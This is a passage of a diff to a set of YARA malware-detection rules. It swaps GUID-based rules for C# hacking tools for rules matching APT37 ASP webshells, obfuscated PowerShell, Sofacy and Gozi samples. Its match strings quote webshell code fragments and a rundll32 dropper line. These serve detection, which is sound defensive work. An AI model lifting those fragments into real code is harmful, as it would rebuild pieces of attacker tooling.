+		id = "6c3e8465-d607-59bf-85fc-5abbef71fb1c"
+		date = "2020-12-15"
+		modified = "2023-12-05"
+		reference = "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec20.yar#L52-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ab4243f5e4efcadc9d1a9a34bdb4d5aedcf500accf4cb3681a73015c7f3f6900"
+		hash = "b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9"
+		logic_hash = "241f2683adc29e8aca30ae24278f3703fef0fed6b276dae488fdb32c167af1c9"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
-	strings:
-		$typelibguid0lo = "f93c99ed-28c9-48c5-bb90-dd98f18285a6" ascii wide
-
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		(pe.version_info [ "OriginalFilename" ] contains "MFC_DLL.dll" ) and ( pe.exports ( "SMain" ) and pe.exports ( "SMainW" ) )
 }
-
-rule SIGNATURE_BASE_HKTL_NET_GUID_Browserghost : FILE
+rule SIGNATURE_BASE_Hvs_APT37_Webshell_Img_Thumbs_Asp : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "adcc5d12-c393-5708-ae0b-a85f2187c881"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/QAX-A-Team/BrowserGhost"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1755-L1770"
+		description = "Webshell named img.asp, thumbs.asp or thumb.asp used by APT37"
+		author = "Moritz Oettle"
+		id = "e45d4507-81de-5f72-9ce2-4f0e3e5c62b1"
+		date = "2020-12-15"
+		modified = "2023-12-05"
+		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec20.yar#L68-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "448177aae4b0b2f17faefb22599649b7264c85e3af96b1d78bab6ada891b7a82"
+		hash = "94d2448d3794ae3f29678a7337473d259b5cfd1c7f703fe53ee6c84dd10a48ef"
+		logic_hash = "58ccee11c08330c8cd4148e623a2e59e024d6d5f3067331dbdd962d0f6a8daa4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "2133c634-4139-466e-8983-9a23ec99e01b" ascii wide
+		$s1 = "strMsg = \"E : F\"" fullword ascii
+		$s2 = "strMsg = \"S : \" & Len(fileData)" fullword ascii
+		$s3 = "Left(workDir, InStrRev(workDir, \"/\")) & \"video\""
+		$a1 = "Server.CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+		$a2 = "Dim tmpPath, workDir" fullword ascii
+		$a3 = "Dim objFSO, objTextStream" fullword ascii
+		$a4 = "workDir = Request.ServerVariables(\"URL\")" fullword ascii
+		$a5 = "InStrRev(workDir, \"/\")" ascii
+		$g1 = "WriteFile = 0" fullword ascii
+		$g2 = "fileData = Request.Form(\"fp\")" fullword ascii
+		$g3 = "fileName = Request.Form(\"fr\")" fullword ascii
+		$g4 = "Err.Clear()" fullword ascii
+		$g5 = "Option Explicit" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them and not pe.is_dll ( )
+		filesize < 2KB and ( ( 1 of ( $s* ) ) or ( 3 of ( $a* ) ) or ( 5 of ( $g* ) ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshot : FILE
+rule SIGNATURE_BASE_Hvs_APT37_Webshell_Template_Query_Asp : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9d59cd53-53b1-57db-b391-eee4dd6feec0"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/tothi/SharpShot"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1772-L1785"
+		description = "Webshell named template-query.aspimg.asp used by APT37"
+		author = "Moritz Oettle"
+		id = "dc006b46-4c51-59cd-8b7d-adbfec86cd2e"
+		date = "2020-12-15"
+		modified = "2023-12-05"
+		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec20.yar#L97-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "65bbe20eb2aac648648b828c176e418648ebdc6372d287e4bc3b0d3edf233e86"
+		hash = "961a66d01c86fa5982e0538215b17fb9fae2991331dfea812b8c031e2ceb0d90"
+		logic_hash = "d8bd017e9103bddb0b8a86effa8a4b0617b54bd643bcc36b6f678a3e60f8559f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "057aef75-861b-4e4b-a372-cfbd8322c8e1" ascii wide
+		$g1 = "server.scripttimeout=600" fullword ascii
+		$g2 = "response.buffer=true" fullword ascii
+		$g3 = "response.expires=-1" fullword ascii
+		$g4 = "session.timeout=600" fullword ascii
+		$a1 = "redhat hacker" ascii
+		$a2 = "want_pre.asp" ascii
+		$a3 = "vgo=\"admin\"" ascii
+		$a4 = "ywc=false" ascii
+		$s1 = "public  br,ygv,gbc,ydo,yka,wzd,sod,vmd" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize > 70KB and filesize < 200KB and ( ( 1 of ( $s* ) ) or ( 2 of ( $a* ) ) or ( 3 of ( $g* ) ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Offensive__NET : FILE
+rule SIGNATURE_BASE_Hvs_APT37_Webshell_Controllers_Asp : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b98495fb-0338-5042-a7ce-d117204eb91e"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/mrjamiebowman/Offensive-.NET"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1787-L1800"
+		description = "Webshell named controllers.asp or inc-basket-offer.asp used by APT37"
+		author = "Moritz Oettle"
+		id = "82370415-30f4-514d-8806-e2daced96f07"
+		date = "2020-12-15"
+		modified = "2023-12-05"
+		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec20.yar#L140-L218"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dddbee2e6d1cd4046f91192fe26841cc6c359dd9188d472c8b2acca691c15a34"
+		hash = "829462fc6d84aae04a962dfc919d0a392265fbf255eab399980d2b021e385517"
+		logic_hash = "a6e53e99f7500683d3b62a7630cecb53ee6c13b335cbf9912366675db964aefe"
 		score = 75
-		quality = 85
+		quality = 28
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "11fe5fae-b7c1-484a-b162-d5578a802c9c" ascii wide
+		$s0 = "<%@Language=VBScript.Encode" ascii
+		$x1 = { 64 7F 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x2 = { 64 7F 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x3 = { 64 7F 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x4 = { 64 7F 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x5 = { 64 7F 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x6 = { 64 7F 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x7 = { 64 7F 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x8 = { 64 41 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x9 = { 64 41 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x10 = { 64 41 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x11 = { 64 41 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x12 = { 64 7F 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x13 = { 64 41 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x14 = { 64 41 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x15 = { 64 41 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x16 = { 64 41 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x17 = { 64 41 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x18 = { 64 41 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x19 = { 64 41 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x20 = { 64 41 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x21 = { 64 41 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x22 = { 64 41 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x23 = { 64 7F 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x24 = { 64 41 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x25 = { 64 41 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x26 = { 6A 7F 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x27 = { 6A 7F 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x28 = { 6A 7F 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x29 = { 6A 7F 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x30 = { 6A 7F 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x31 = { 6A 7F 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x32 = { 6A 7F 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x33 = { 6A 7F 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x34 = { 64 7F 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x35 = { 6A 7F 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x36 = { 6A 7F 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x37 = { 6A 7F 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x38 = { 6A 7F 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x39 = { 6A 7F 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x40 = { 6A 7F 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x41 = { 6A 7F 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x42 = { 6A 7F 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x43 = { 6A 41 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x44 = { 6A 41 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x45 = { 64 7F 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x46 = { 6A 41 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x47 = { 6A 41 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x48 = { 6A 41 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x49 = { 6A 41 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x50 = { 6A 41 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x51 = { 6A 41 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x52 = { 6A 41 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x53 = { 6A 41 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x54 = { 6A 41 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x55 = { 6A 41 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x56 = { 64 7F 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x57 = { 6A 41 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x58 = { 6A 41 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x59 = { 6A 41 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x60 = { 6A 41 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x61 = { 64 7F 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x62 = { 64 7F 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x63 = { 64 7F 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x64 = { 64 7F 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize > 50KB and filesize < 200KB and ( $s0 and 1 of ( $x* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ruralbishop : FILE
+rule SIGNATURE_BASE_Powershell_Case_Anomaly : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8fd89465-1ecc-5eda-b2ab-273172ad945d"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/rasta-mouse/RuralBishop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1802-L1815"
+		description = "Detects obfuscated PowerShell hacktools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "41c97d15-c167-5bdd-a8b4-871d14f66fe1"
+		date = "2017-08-11"
+		modified = "2022-06-12"
+		reference = "https://twitter.com/danielhbohannon/status/905096106924761088"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_case_anomalies.yar#L11-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8dfa8652507851305da814b1410a7854be2c1c78cac325881118829be3456776"
-		score = 75
-		quality = 85
+		logic_hash = "cbef94b899a2d22930ee0e8b3eac03c505db629d19a62ddd8f56482403dfa595"
+		score = 70
+		quality = 77
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "fe4414d9-1d7e-4eeb-b781-d278fe7a5619" ascii wide
+		$s1 = "powershell" nocase ascii wide
+		$sn1 = "powershell" ascii wide
+		$sn2 = "Powershell" ascii wide
+		$sn3 = "PowerShell" ascii wide
+		$sn4 = "POWERSHELL" ascii wide
+		$sn5 = "powerShell" ascii wide
+		$sn6 = "PowerShelL" ascii wide
+		$sn7 = "PowershelL" ascii wide
+		$a1 = "wershell -e " nocase wide ascii
+		$an1 = "wershell -e " wide ascii
+		$an2 = "werShell -e " wide ascii
+		$k1 = "-noprofile" fullword nocase ascii wide
+		$kn1 = "-noprofile" ascii wide
+		$kn2 = "-NoProfile" ascii wide
+		$kn3 = "-noProfile" ascii wide
+		$kn4 = "-NOPROFILE" ascii wide
+		$kn5 = "-Noprofile" ascii wide
+		$fp1 = "Microsoft Code Signing" ascii fullword
+		$fp2 = "Microsoft Corporation" ascii
+		$fp3 = "Microsoft.Azure.Commands.ContainerInstance" wide
+		$fp4 = "# Localized PSGet.Resource.psd1" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 800KB and ( ( #s1 > #sn1 + #sn2 + #sn3 + #sn4 + #sn5 + #sn6 + #sn7 ) or ( #a1 > #an1 + #an2 ) or ( #k1 > #kn1 + #kn2 + #kn3 + #kn4 + #kn5 ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Deviceguardbypasses : FILE
+rule SIGNATURE_BASE_Wscriptshell_Case_Anomaly : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3790faac-b5be-5999-b35f-71a2ef02b6ed"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/tyranid/DeviceGuardBypasses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1817-L1835"
+		description = "Detects obfuscated wscript.shell commands"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d69d932d-1e39-5259-9200-f0227754f49c"
+		date = "2017-09-11"
+		modified = "2022-06-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_case_anomalies.yar#L62-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aff1a0236c532d5822a440f1d9a0a0265b422ebe0b53d799d53e838aef5f64ad"
-		score = 75
-		quality = 85
+		logic_hash = "5c64e124186ae2eb974639627287fb27fe27eb2855342703e4a27a9c0fd62a91"
+		score = 60
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "f318466d-d310-49ad-a967-67efbba29898" ascii wide
-		$typelibguid1lo = "3705800f-1424-465b-937d-586e3a622a4f" ascii wide
-		$typelibguid2lo = "256607c2-4126-4272-a2fa-a1ffc0a734f0" ascii wide
-		$typelibguid3lo = "4e6ceea1-f266-401c-b832-f91432d46f42" ascii wide
-		$typelibguid4lo = "1e6e9b03-dd5f-4047-b386-af7a7904f884" ascii wide
-		$typelibguid5lo = "d85e3601-0421-4efa-a479-f3370c0498fd" ascii wide
+		$s1 = "WScript.Shell\").Run" nocase ascii wide
+		$sn1 = "WScript.Shell\").Run" ascii wide
+		$sn2 = "wscript.shell\").run" ascii wide
+		$sn3 = "WSCRIPT.SHELL\").RUN" ascii wide
+		$sn4 = "Wscript.Shell\").Run" ascii wide
+		$sn5 = "WScript.shell\").Run" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 3000KB and #s1 > #sn1 + #sn2 + #sn3 + #sn4 + #sn5
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_AMSI_Handler : FILE
+
+rule SIGNATURE_BASE_Sofacy_Oct17_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "40768acf-fa9e-531a-83fd-187814ddc2d4"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/two06/AMSI_Handler"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1837-L1853"
+		description = "Detects Sofacy malware reported in October 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6896dcf3-e422-5a40-bc1e-d1f35ae95c14"
+		date = "2017-10-23"
+		modified = "2023-12-05"
+		reference = "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_oct17_camp.yar#L13-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3b27157331b3b9f6897134172f7dd9198fad7747c12d1020cb3e2d924c2910ce"
+		logic_hash = "c3620d0b347e6cc54af9e046f6b3b6515bfa23dd11225ce2720e09838708a42e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "522fd9b35323af55113455d823571f71332e53dde988c2eb41395cf6b0c15805"
 
 	strings:
-		$typelibguid0lo = "d829426c-986c-40a4-8ee2-58d14e090ef2" ascii wide
-		$typelibguid1lo = "86652418-5605-43fd-98b5-859828b072be" ascii wide
-		$typelibguid2lo = "1043649f-18e1-41c4-ae8d-ac4d9a86c2fc" ascii wide
-		$typelibguid3lo = "1d920b03-c537-4659-9a8c-09fb1d615e98" ascii wide
+		$x1 = "%localappdata%\\netwf.dll" fullword wide
+		$x2 = "set path = \"%localappdata%\\netwf.dll\"" fullword ascii
+		$x3 = "%localappdata%\\netwf.bat" fullword wide
+		$x4 = "KlpSvc.dll" fullword ascii
+		$g1 = "set path = \"%localappdata%\\" ascii
+		$g2 = "%localappdata%\\" wide
+		$s1 = "start rundll32.exe %path %,#1a" fullword ascii
+		$s2 = "gshell32" fullword wide
+		$s3 = "s - %lu" fullword ascii
+		$s4 = "be run i" fullword ascii
+		$s5 = "ingToBinhary" fullword ascii
+		$s6 = "%j%Xjs" fullword ascii
+		$s7 = "if NOT exist %path % (exit)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a2d1be6502b4b3c28959a4fb0196ea45" or pe.exports ( "KlpSvc" ) or ( 1 of ( $x* ) or 4 of them ) or ( $s1 and all of ( $g* ) ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_RAT_Telegramspybot : FILE
+
+rule SIGNATURE_BASE_Sofacy_Oct17_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "57d22201-a051-5040-927c-30da3fc684fd"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/SebastianEPH/RAT.TelegramSpyBot"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1855-L1868"
+		description = "Detects Sofacy malware reported in October 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c820eab0-9b64-5718-8681-a4f515ee462b"
+		date = "2017-10-23"
+		modified = "2023-12-05"
+		reference = "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_oct17_camp.yar#L49-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9fc671ef600548d962a2d5ab12ba3111ed19e83ef96d2d536eb343bb8fb4b0d2"
+		logic_hash = "c2736cf9efbb022590f4c23986531e645ac412a5b98a950b143f2d75a33e8063"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ef027405492bc0719437eb58c3d2774cc87845f30c40040bbebbcc09a4e3dd18"
 
 	strings:
-		$typelibguid0lo = "8653fa88-9655-440e-b534-26c3c760a0d3" ascii wide
+		$x1 = "netwf.dll" fullword wide
+		$s1 = "%s - %s - %2.2x" fullword wide
+		$s2 = "%s - %lu" fullword ascii
+		$s3 = "%s \"%s\", %s" fullword wide
+		$s4 = "%j%Xjsf" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and ( pe.imphash ( ) == "13344e2a717849489bcd93692f9646f7" or ( 4 of them ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Thehacktoolboxteek : FILE
+rule SIGNATURE_BASE_MAL_Gozicrypter_Dec20_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ad8cf2c8-f70e-5f46-92fa-46e1fa5e683c"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/teeknofil/TheHackToolBoxTeek"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1870-L1889"
+		description = "Detects crypter associated with several Gozi samples"
+		author = "James Quinn"
+		id = "d4a48612-fa6f-5f03-8d27-5f6b79b2a070"
+		date = "2020-12-02"
+		modified = "2023-12-05"
+		reference = "YaraExchange"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_gozi_crypter.yar#L2-L13"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f18d6be2789371f3db649d0df3fc31a2e97604b399873c9843c1e08c981be0da"
-		score = 75
+		logic_hash = "51fdfbb59b8f52cc2ff89d994c0f89d2c2895c346b098879c68b4ccb880783c1"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "2aa8c254-b3b3-469c-b0c9-dcbe1dd101c0" ascii wide
-		$typelibguid1lo = "afeff505-14c1-4ecf-b714-abac4fbd48e7" ascii wide
-		$typelibguid2lo = "4cf42167-a5cf-4b2d-85b4-8e764c08d6b3" ascii wide
-		$typelibguid3lo = "118a90b7-598a-4cfc-859e-8013c8b9339c" ascii wide
-		$typelibguid4lo = "3075dd9a-4283-4d38-a25e-9f9845e5adcb" ascii wide
-		$typelibguid5lo = "295655e8-2348-4700-9ebc-aa57df54887e" ascii wide
-		$typelibguid6lo = "74efe601-9a93-46c3-932e-b80ab6570e42" ascii wide
+		$s1 = { 89 05 ?? ?? ?? ?? 81 2d ?? ?? ?? ?? 01 00 00 00 81 3D ?? ?? ?? ?? 00 00 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and any of them and filesize < 1000KB
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Usbtrojan : FILE
+rule SIGNATURE_BASE_SUSP_BAT2EXE_Bdargo_Converted_BAT : FILE
 {
 	meta:
